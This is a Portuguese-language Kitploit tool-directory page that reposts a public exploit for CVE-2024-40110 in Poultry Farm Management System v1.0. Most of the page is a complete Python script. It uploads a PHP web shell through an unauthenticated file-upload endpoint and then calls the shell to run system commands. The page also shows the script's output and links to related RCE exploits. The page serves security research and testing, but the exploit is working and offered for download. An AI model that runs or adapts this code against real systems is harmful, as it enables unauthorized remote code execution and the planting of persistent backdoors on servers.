Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Unauthenticated-Remote-Code-Execution-RCE---Poultry-Farm-Management-System-v1.0 — Exploit de RCE não autenticado para o Poultry Farm Management System v1.0 (CVE-2024-40110) usando uma vulnerabilidade de upload de arquivo para executar comandos arbitrários. | Kitploit
Ferramentas/GitHubGitHub/w3bn00b3r/unauthenticated-remote-code-execution-rce---poultry-farm-management-system-v1.0
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubw3bn00b3r/unauthenticated-remote-code-execution-rce---poultry-farm-management-system-v1.0

Unauthenticated-Remote-Code-Execution-RCE---Poultry-Farm-Management-System-v1.0

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit de RCE não autenticado para o Poultry Farm Management System v1.0 (CVE-2024-40110) usando uma vulnerabilidade de upload de arquivo para executar comandos arbitrários.

Ver Repositório
2há 2 anosAinda não revisado

Título do Exploit: Execução Remota de Código (RCE) Não Autenticada - Sistema de Gerenciamento de Granja Avícola v1.0

Data: 24-06-2024

CVE: CVE-2024-40110

EDB-ID: 52053

Autor do Exploit: Jerry Thomas (w3bn00b3r)

Homepage do fornecedor: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html

Link do software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Redcock-Farm.zip

Categoria: Aplicação Web

Versão: 1.0

Testado em: Windows 10 | Xampp v3.3.0

Endpoint vulnerável: http://localhost/farm/product.php

Código do Exploit:

root@kitploit:~
import requests
from colorama import Fore, Style, init

# Initialize colorama
init(autoreset=True)

def upload_backdoor(target):
    upload_url = f"{target}/farm/product.php"
    shell_url = f"{target}/farm/assets/img/productimages/web-backdoor.php"

    # Prepare the payload
    payload = {
        'category': 'CHICKEN',
        'product': 'rce',
        'price': '100',
        'save': ''
    }

    # PHP code to be uploaded
    command = "hostname"
    data = f"<?php system('{command}');?>" 

    # Prepare the file data
    files = {
        'productimage': ('web-backdoor.php', data, 'application/x-php')
    }

    try:
        print("Sending POST request to:", upload_url)
        response = requests.post(upload_url, files=files, data=payload, verify=False)

        if response.status_code == 200:
            print("\nResponse status code:", response.status_code)
            print(f"Shell has been uploaded successfully: {shell_url}")

            # Make a GET request to the shell URL to execute the command
            shell_response = requests.get(shell_url, verify=False)
            print("Command output:", Fore.GREEN + shell_response.text.strip())
        else:
            print(f"Failed to upload shell. Status code: {response.status_code}")
            print("Response content:", response.text)
    except requests.RequestException as e:
        print(f"An error occurred: {e}")

if __name__ == "__main__":
    target = "http://localhost"  # Change this to your target
    upload_backdoor(target)

Vídeo PoC

root@kitploit:~
Link - https://drive.google.com/file/d/1gOXhAjtUuIJHGz5SEpz3Tu50CEzoiDw_/view?usp=drive_link

Saída

Execute - python3 exploit.py ou python exploit.py

root@kitploit:~
Sending POST request to: http://localhost/farm/product.php
Response status code: 200
Shell has been uploaded successfully: http://localhost/farm/assets/img/productimages/web-backdoor.php
Command output: DESKTOP-EGV8AH5

Referências

Para desenvolver o código do exploit:

  • https://github.com/0xConstant/Gym-Management-1.0-unauthenticated-RCE/blob/main/exploit.py
  • https://github.com/h3x0crypt/PHPUnit-RCE/blob/master/PHPunit-RCE.php
Baixar ferramenta